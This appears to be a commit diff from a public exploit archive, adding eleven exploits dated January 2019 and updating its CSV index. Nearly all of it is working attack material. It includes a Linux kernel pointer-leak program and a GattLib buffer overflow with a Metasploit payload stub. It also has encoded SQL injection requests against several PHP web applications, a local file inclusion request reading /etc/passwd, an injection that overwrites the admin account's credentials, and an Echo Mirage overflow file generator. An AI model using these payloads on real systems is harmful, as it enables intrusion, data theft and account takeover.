DB: 2019-01-22

11 changes to exploits/shellcodes

Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer
Echo Mirage 3.1 - Buffer Overflow (PoC)

GattLib 0.2 - Stack Buffer Overflow
Kepler Wallpaper Script 1.1 - SQL Injection
Coman 1.0 - 'id' SQL Injection
Reservic 1.0 - 'id' SQL Injection
MoneyFlux 1.0 - 'id' SQL Injection
PHP Dashboards NEW 5.8 - 'dashID' SQL Injection
PHP Dashboards NEW 5.8 - Local File Inclusion
PHP Uber-style GeoTracking 1.1 - SQL Injection
Adianti Framework 5.5.0 - SQL Injection

exploits/linux/dos/46208.c

@@ -0,0 +1,50 @@
+#define _GNU_SOURCE
+#define _BSD_SOURCE
+#include <sys/timex.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/ipc.h>
+#include <sys/sem.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/syscall.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <kptr-lib.h>
+
+// Ubuntu 4.13.0-16-generic
+// gcc -o poc poc.c -m32
+
+struct timex time;
+
+int main(int argc, char **argv)
+{
+	int r;
+	unsigned long long stack_offset, kernel_base;
+	unsigned int leak_value;
+	unsigned int high = 0xffffffff;
+	
+	memset(&time, 0, sizeof(time));
+	time.modes = 0x8000;
+
+	mmap(0,0xa000,3,2022,-1,0);
+
+	adjtimex(&time);    
+	leak_value = time.tai;
+	printf("--> leak_value : %x\n", leak_value);
+	
+	memcpy(&kernel_base, &leak_value, 4);
+	memcpy((char *)&kernel_base + 4, &high, 4);
+	stack_offset = 0x1fc4a4;
+	kernel_base = leak_value - stack_offset;
+	printf("--> kernel_stack_base : %llx\n", kernel_base);
+
+ 	return 0;
+}

exploits/linux/remote/46215.rb

@@ -0,0 +1,60 @@
+Exploit Title: stack-based overflow
+# Date: 2019-11-21
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: http://labapart.com/
+# Software Link: https://github.com/labapart/gattlib/issues/81
+# Version: 0.2
+# Tested on: Linux 4.15.0-38-generic
+# CVE: CVE-2019-6498
+# References:
+# https://github.com/labapart/gattlib/issues/81
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498
+
+## Summary:
+While fuzzing gattlib (Gattlib is a library to access GATT information from
+BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based
+buffer-overflow was observed.
+
+## Vulnerable code from gattlib.c
+// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
+strncpy(device_address_str, dst, sizeof(device_address_str));
+for (i = 0; i < strlen(device_address_str); i++) {
+if (device_address_str[i] == ':') {
+device_address_str[i] = '_';
+}
+}
+
+## Vulnerable code from discover.c
+if (argc != 2) {
+printf("%s <device_address>\n", argv[0]);
+return 1;
+}
+
+connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
+0, 0);
+if (connection == NULL) {
+fprintf(stderr, "Fail to connect to the bluetooth device.\n");
+return 1;
+}
+
+## PoC
+
+./discover `python -c 'print "A"*20'`
+
+## MSF code
+
+def exploit
+    connect
+
+    print_status("Sending #{payload.encoded.length} byte payload...")
+
+    # Building the buffer for transmission
+    buf = "A" * 20
+    buf += [ target.ret ].pack('V')
+    buf += payload.encoded
+
+    sock.put(buf)
+    sock.get
+
+    handler
+end

exploits/php/webapps/46207.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-19
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://keplerwallpapers.online/
+# Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]//[PATH]/category/xxx[SQL]
+# 
+
+GET /[PATH]/category/xxx%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Cookie: PHPSESSID=6963a7f072dbf72fb4cb420c9f5ad80a; ResolutionWidthAuto=1366; ResolutionHeightAuto=768; FilterType=Auto
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Sat, 19 Jan 2019 09:01:06 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.37
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Strict-Transport-Security: max-age=31536000
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/46209.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Coman - Company Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-20
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ragob.com/
+# Software Link: https://codecanyon.net/item/coman-company-management-system/17799270
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=task&id=[SQL]&backTo=dashboard
+# 
+
+GET /[PATH]/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Sun, 20 Jan 2019 12:59:10 GMT
+Server: Apache/2.4.10 (Debian)
+X-Powered-By: PHP/7.0.28
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46210.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Reservic - Reserves Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-20
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ragob.com/
+# Software Link: https://codecanyon.net/item/reservic-reserves-management-system/11736786
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=[SQL]&backTo=dashboard
+# 
+
+GET /[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Sun, 20 Jan 2019 13:01:16 GMT
+Server: Apache/2.4.10 (Debian)
+X-Powered-By: PHP/7.0.28
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46211.txt

@@ -0,0 +1,38 @@
+# Exploit Title: MoneyFlux - Cashflow Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-20
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ragob.com/
+# Software Link: https://codecanyon.net/item/moneyflux-laravel-5-cashflow-system/21577611
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php/framework-crud-updateaction?id=[SQL]&crud=expense
+# 
+
+GET /[PATH]/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Sun, 20 Jan 2019 12:39:58 GMT
+Server: Apache/2.4.10 (Debian)
+X-Powered-By: PHP/7.0.28
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=97
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46212.txt

@@ -0,0 +1,37 @@
+# Exploit Title: PHP Dashboards NEW 5.8 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-21
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://dataninja.biz
+# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
+# Version: 5.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/php/save/savedescriptions.php?dashID=[SQL]
+# 
+
+GET /[PATH]/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 20 Jan 2019 21:08:05 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Host-Header: 192fc2e7e50945beb8231a492d6a8024
+X-Proxy-Cache: MISS

exploits/php/webapps/46213.txt

@@ -0,0 +1,36 @@
+# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
+# Dork: N/A
+# Date: 2019-01-21
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://dataninja.biz
+# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
+# Version: 5.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/php/file/read.php
+# 
+
+POST /[PATH]/php/file/read.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 37
+Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+filename=../../../../../../etc/passwd: undefined
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 20 Jan 2019 20:56:25 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Host-Header: 192fc2e7e50945beb8231a492d6a8024

exploits/php/webapps/46214.txt

@@ -0,0 +1,85 @@
+# Exploit Title: PHP Uber-style GeoTracking 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-21
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://dataninja.biz
+# Software Link: https://codecanyon.net/item/php-uberstyle-geotracking/20320021
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/php/profile/index.php
+# 
+
+POST /[PATH]/php/profile/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 354
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 20 Jan 2019 21:47:06 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Host-Header: 192fc2e7e50945beb8231a492d6a8024
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/php/profile/index.php
+# 
+
+POST /[PATH]/php/profile/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 355
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+mapkey=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 20 Jan 2019 21:46:37 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Host-Header: 192fc2e7e50945beb8231a492d6a8024
+
+# POC: 
+# 3)
+# http://localhost/[PATH]/php/photos/index.php
+# 
+
+POST /[PATH]/php/photos/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 231
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2d%2d%20%2d: undefined
+HTTP/1.1 200 OK
+Server: nginx
+Date: Sun, 20 Jan 2019 21:49:23 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Host-Header: 192fc2e7e50945beb8231a492d6a8024

exploits/php/webapps/46217.txt

@@ -0,0 +1,30 @@
+# Exploit Title: [SQL Injection in Adianti Framework]
+# Date: [2018-12-18]
+# Exploit Author: [Joner de Mello Assolin]
+# Vendor Homepage: [https://www.adianti.com.br]
+# Version: [5.5.0 and 5.6.0] (REQUIRED)
+# Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
+# Software Link: [https://www.adianti.com.br/download-center?app=template]
+
+
+
+The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, 
+by editing the profile itself.
+
+
+
+POC:
+
+1-Register an ordinary user or use the framework standard(user=user password=user)
+
+2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit
+
+3- In the field name enter SQL injection and click Save:
+
+(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#
+
+4-Go to the login screen and enter username and password: Now you can log in as administrator!.
+
+USER: anonymous
+
+PASSWORD: anonymous

exploits/windows/dos/46216.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python
+
+# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
+# Date: 21-01-2019
+# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
+# Version: 3.1 (x64)
+# Exploit Author: InitD Community
+# Contact: https://twitter.com/initd_sh
+# Website: http://initd.sh/
+# Tested on: Windows 7
+
+
+"""
+Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste  in "action" field. --> BOoo0m.
+
+Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
+This Bug Identified by Touhid M.Shaikh
+"""
+
+buffer = "A"*24241
+
+RBP = "B"*8
+
+PAD = "C"*50
+
+evil = buffer + RBP + PAD
+
+
+evil_file = open("Echo-Mirage-BoF-POC.txt","w")
+
+evil_file.write(evil)
+
+evil_file.close()

files_exploits.csv

@@ -6268,6 +6268,8 @@ id,file,description,date,author,type,platform,port
 46203,exploits/windows/dos/46203.txt,"Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
 46204,exploits/windows/dos/46204.js,"Microsoft Edge Chakra - 'InitClass' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
 46205,exploits/windows/dos/46205.js,"Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free",2019-01-18,"Google Security Research",dos,windows,
+46208,exploits/linux/dos/46208.c,"Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer",2019-01-21,wally0813,dos,linux,
+46216,exploits/windows/dos/46216.py,"Echo Mirage 3.1 - Buffer Overflow (PoC)",2019-01-21,"InitD Community",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17108,6 +17110,7 @@ id,file,description,date,author,type,platform,port
 46143,exploits/hardware/remote/46143.rb,"Hootoo HT-05 - Remote Code Execution (Metasploit)",2019-01-14,"Andrei Manole",remote,hardware,
 46201,exploits/cgi/remote/46201.rb,"Webmin 1.900 - Remote Command Execution (Metasploit)",2019-01-18,AkkuS,remote,cgi,10000
 46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,
+46215,exploits/linux/remote/46215.rb,"GattLib 0.2 - Stack Buffer Overflow",2019-01-21,"Dhiraj Mishra",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40684,3 +40687,11 @@ id,file,description,date,author,type,platform,port
 46192,exploits/php/webapps/46192.txt,"phpTransformer 2016.9 - Directory Traversal",2019-01-18,"Ihsan Sencan",webapps,php,80
 46200,exploits/php/webapps/46200.txt,"Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings",2019-01-18,"Praveen Sutar",webapps,php,80
 46206,exploits/php/webapps/46206.txt,"Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload",2019-01-18,_jazz______,webapps,php,80
+46207,exploits/php/webapps/46207.txt,"Kepler Wallpaper Script 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
+46209,exploits/php/webapps/46209.txt,"Coman 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
+46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
+46211,exploits/php/webapps/46211.txt,"MoneyFlux 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
+46212,exploits/php/webapps/46212.txt,"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
+46213,exploits/php/webapps/46213.txt,"PHP Dashboards NEW 5.8 - Local File Inclusion",2019-01-21,"Ihsan Sencan",webapps,php,
+46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,
+46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,